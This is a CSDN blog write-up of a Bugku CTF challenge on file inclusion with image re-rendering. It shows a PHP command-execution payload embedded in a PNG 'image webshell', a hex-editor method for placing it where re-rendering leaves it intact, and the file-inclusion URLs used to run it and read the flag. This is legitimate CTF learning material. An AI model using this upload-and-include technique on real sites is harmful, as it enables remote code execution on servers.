bugku---文件包含2(二次渲染)

CTF 专栏收录该内容
14 篇文章 1 订阅

题目
http://123.206.31.85:49166/
首先查看源码可以发现隐藏的文件名
在这里插入图片描述
我们访问该文件地址
在这里插入图片描述
我们上传一张图片马,
构造代码为

<script language=php>system("ls")</script>

一开始我只是构造了一张普通的的图片马,进行上传
在这里插入图片描述
上传后页面可以看到上传的文件路径

upload/201811301122325649.png

访问该文件时

http://123.206.31.85:49166/index.php?file=upload/201811301122325649.png

会发现,我们上传后的图片马被重新渲染了,
原先插入的代码已经消失了
在这里插入图片描述
所以构造图片马时,我们可以将代码插入到图片不会被渲染的部分

*这里是有关于二次渲染详细介绍的博客*
https://xz.aliyun.com/t/2657

以png为例
我们打开Hxd软件,手动添加代码到不会被二次渲染的位置
在这里插入图片描述
进行保存,重新上传该图片马,访问图片路径
在这里插入图片描述
图片马成功运行代码,
可以看到我们需要找的文件名,
让后访问该文件

http://123.206.31.85:49166/index.php?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt

在这里插入图片描述
得到flag

SKCTF{uP104D_1nclud3_426fh8_is_Fun} 
  • 1
    点赞
  • 2
    评论
  • 1
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2021 CSDN 皮肤主题: 技术黑板 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值